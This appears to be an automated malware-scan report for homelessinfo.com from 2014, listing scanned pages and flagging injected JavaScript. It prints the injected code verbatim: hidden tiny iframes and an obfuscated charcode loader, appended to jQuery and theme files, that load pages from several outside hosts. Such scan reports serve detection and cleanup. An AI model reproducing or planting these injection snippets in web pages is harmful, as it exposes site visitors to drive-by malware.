Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=homelessinfo.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://homelessinfo.com/ | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 25 Apr 2014 19:20:11 GMT Pragma: no-cache Location: ?id=1 Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3 Vary: User-Agent,Accept-Encoding Content-Length: 1428 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=46ade2ff121a92cd531d07ddd1ce5bde; path=/ X-Powered-By: PHP/4.4.9 | clean |
http://homelessinfo.com/?id=1 | 200 OK Content-Length: 29410 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php'); _q.style.position = 'absolute'; _q.style.width = '12px'; _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1); _q.style.left = '-4327px'; document.write('<div id=\'pzeadv\'></div>'); document.getElementById('pzeadv').appendChild(_q); Antivirus reports:
| ||
http://homelessinfo.com/themes/maitscocorporate/js/jquery.js | 200 OK Content-Length: 100362 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ var _jQuery = window.jQuery, _$ = window.$; var jQuery = window.jQuery = window.$ = function( selector, context ) { return new jQuery.fn.init( selector, context ); }; var quickExpr = /^[^<]*(<(.|\s)+>)[^>]*$|^#(\w+)$/, isSimple = /^.[^:#\[\.]*$/, undefined; jQuery.fn = jQuery.prototype = { init: function( selector, context ) { selector = selector || document; if ( selector.nodeType ) { this[0] = selecto jQuery.fn["outer" + name] = function(margin) { return this["inner" + name]() + num(this, "border" + tl + "Width") + num(this, "border" + br + "Width") + (margin ? num(this, "margin" + tl) + num(this, "margin" + br) : 0); }; });})(); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mimosofacial.com/showthread.php?sid=24571></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mimosofacial.com/showthread.php?sid=24571 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mimosofacial.com/showthread.php?sid=24571> | ||
http://homelessinfo.com/themes/maitscocorporate/js/curvycorners.src.js | 200 OK Content-Length: 56082 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function browserdetect() { var agent = navigator.userAgent.toLowerCase(); this.isIE = agent.indexOf("msie") > -1; this.ieVer = this.isIE ? /msie\s(\d\.\d)/.exec(agent)[1] : 0; this.isMoz = agent.indexOf('firefox') != -1; this.isSafari = agent.indexOf('safari') != -1; this.quirksMode= this.isIE && (!document.compatMode || document.compatMode.indexOf("BackCompat") > -1); this.isOp = 'opera' in window; this.isWebKit = age }; } if (typeof curvyCornersNoAutoScan === 'undefined' || curvyCornersNoAutoScan === false) { if (curvyBrowser.isOp) document.addEventListener("DOMContentLoaded", curvyCorners.init, false); else addEvent(window, 'load', curvyCorners.init, false); } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mimosofacial.com/showthread.php?sid=24571></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mimosofacial.com/showthread.php?sid=24571 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mimosofacial.com/showthread.php?sid=24571> | ||
http://homelessinfo.com/themes/maitscocorporate/js/s3Slider.js | 200 OK Content-Length: 4284 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){ $.fn.s3Slider = function(vars) { var element = this; var timeOut = (vars.timeOut != undefined) ? vars.timeOut : 4000; var current = null; var timeOutFn = null; var faderStat = true; var mOver = false; var items = $("#" + element[0].id + "Content ." + element[0].id + "Image"); var itemsSpan = $("#" + element[0].id + "Content ." + } }); }); } } } } makeSlider(); }; })(jQuery); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mimosofacial.com/showthread.php?sid=24571></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mimosofacial.com/showthread.php?sid=24571 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mimosofacial.com/showthread.php?sid=24571> | ||
http://homelessinfo.com/include/xoops.js | 200 OK Content-Length: 7866 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1026703></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://www.lightdragoons.org/ahhs.html?j=1026703></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ return r; } else { return false; } } xoopsOnloadEvent(xoopsExternalLinks); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mimosofacial.com/showthread.php?sid=24571></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://babylonproduction.com/wmci.html?i=1026703></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mimosofacial.com/showthread.php?sid=24571 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mimosofacial.com/showthread.php?sid=24571> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmi.html?j=1026703 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1026703> Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1026703 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1026703> Hidden iFrame found. size: 2x2 src: http://babylonproduction.com/wmci.html?i=1026703 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://babylonproduction.com/wmci.html?i=1026703> Hidden iFrame found. size: 2x2 src: http://www.lightdragoons.org/ahhs.html?j=1026703 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://www.lightdragoons.org/ahhs.html?j=1026703> | ||
http://homelessinfo.com/class/textsanitizer/image/image.js | 200 OK Content-Length: 2055 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{1-prototype;}catch(asd){x=2;}if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105, Decoded script: function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://miamiheattickets.com/http.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://miamiheattickets.com/http.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; Antivirus reports:
| ||
http://homelessinfo.com/modules/evennews/ | 200 OK Content-Length: 22486 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php'); _q.style.position = 'absolute'; _q.style.width = '12px'; _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1); _q.style.left = '-4327px'; document.write('<div id=\'pzeadv\'></div>'); document.getElementById('pzeadv').appendChild(_q); Antivirus reports:
| ||
http://homelessinfo.com/modules/extgallery/ | 200 OK Content-Length: 23235 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php'); _q.style.position = 'absolute'; _q.style.width = '12px'; _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1); _q.style.left = '-4327px'; document.write('<div id=\'pzeadv\'></div>'); document.getElementById('pzeadv').appendChild(_q); Antivirus reports:
| ||
http://homelessinfo.com/modules/smartfaq/ | HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 25 Apr 2014 19:20:22 GMT Pragma: no-cache Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3 Vary: User-Agent,Accept-Encoding Content-Length: 1382 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=43c6cc4031e193244c461d0d84a32fc4; path=/ X-Powered-By: PHP/4.4.9 | clean |
http://homelessinfo.com/modules/smartfaq/request.php?phpsessid=43c6cc4031e193244c461d0d84a32fc4 | 200 OK Content-Length: 24433 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php'); _q.style.position = 'absolute'; _q.style.width = '12px'; _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1); _q.style.left = '-4327px'; document.write('<div id=\'pzeadv\'></div>'); document.getElementById('pzeadv').appendChild(_q); Antivirus reports:
| ||
http://homelessinfo.com/modules/liaise/ | 200 OK Content-Length: 23334 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php'); _q.style.position = 'absolute'; _q.style.width = '12px'; _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1); _q.style.left = '-4327px'; document.write('<div id=\'pzeadv\'></div>'); document.getElementById('pzeadv').appendChild(_q); Antivirus reports:
| ||
http://homelessinfo.com/banners.php?op=click&bid=5 | 200 OK Content-Length: 19 Content-Type: text/html | clean |
http://homelessinfo.com/test404page.js | 404 Not Found Content-Length: 1066 Content-Type: text/html | clean |
http://homelessinfo.com/modules/content/index.php?id=1 | 200 OK Content-Length: 29359 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php'); _q.style.position = 'absolute'; _q.style.width = '12px'; _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1); _q.style.left = '-4327px'; document.write('<div id=\'pzeadv\'></div>'); document.getElementById('pzeadv').appendChild(_q); Antivirus reports:
| ||
http://homelessinfo.com/modules/content/ | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 25 Apr 2014 19:20:27 GMT Pragma: no-cache Location: ?id=1 Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3 Vary: User-Agent,Accept-Encoding Content-Length: 1428 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=e75ca5e4d650939d92e9eff537697d9d; path=/ X-Powered-By: PHP/4.4.9 | clean |
http://homelessinfo.com/modules/content/?id=1 | 200 OK Content-Length: 29350 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php'); _q.style.position = 'absolute'; _q.style.width = '12px'; _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1); _q.style.left = '-4327px'; document.write('<div id=\'pzeadv\'></div>'); document.getElementById('pzeadv').appendChild(_q); Antivirus reports:
| ||
http://homelessinfo.com/modules/content/index.php?id=4 | 200 OK Content-Length: 32164 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php'); _q.style.position = 'absolute'; _q.style.width = '12px'; _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1); _q.style.left = '-4327px'; document.write('<div id=\'pzeadv\'></div>'); document.getElementById('pzeadv').appendChild(_q); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: homelessinfo.com
Result:
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 25 Apr 2014 19:20:11 GMT
Pragma: no-cache
Location: ?id=1
Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3
Vary: User-Agent,Accept-Encoding
Content-Length: 1428
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=46ade2ff121a92cd531d07ddd1ce5bde; path=/
X-Powered-By: PHP/4.4.9
...1428 bytes of data.
GET / HTTP/1.1
Host: homelessinfo.com
Result:
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 25 Apr 2014 19:20:11 GMT
Pragma: no-cache
Location: ?id=1
Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3
Vary: User-Agent,Accept-Encoding
Content-Length: 1428
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=46ade2ff121a92cd531d07ddd1ce5bde; path=/
X-Powered-By: PHP/4.4.9
...1428 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: homelessinfo.com
Referer: http://www.google.com/search?q=homelessinfo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: homelessinfo.com
Referer: http://www.google.com/search?q=homelessinfo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.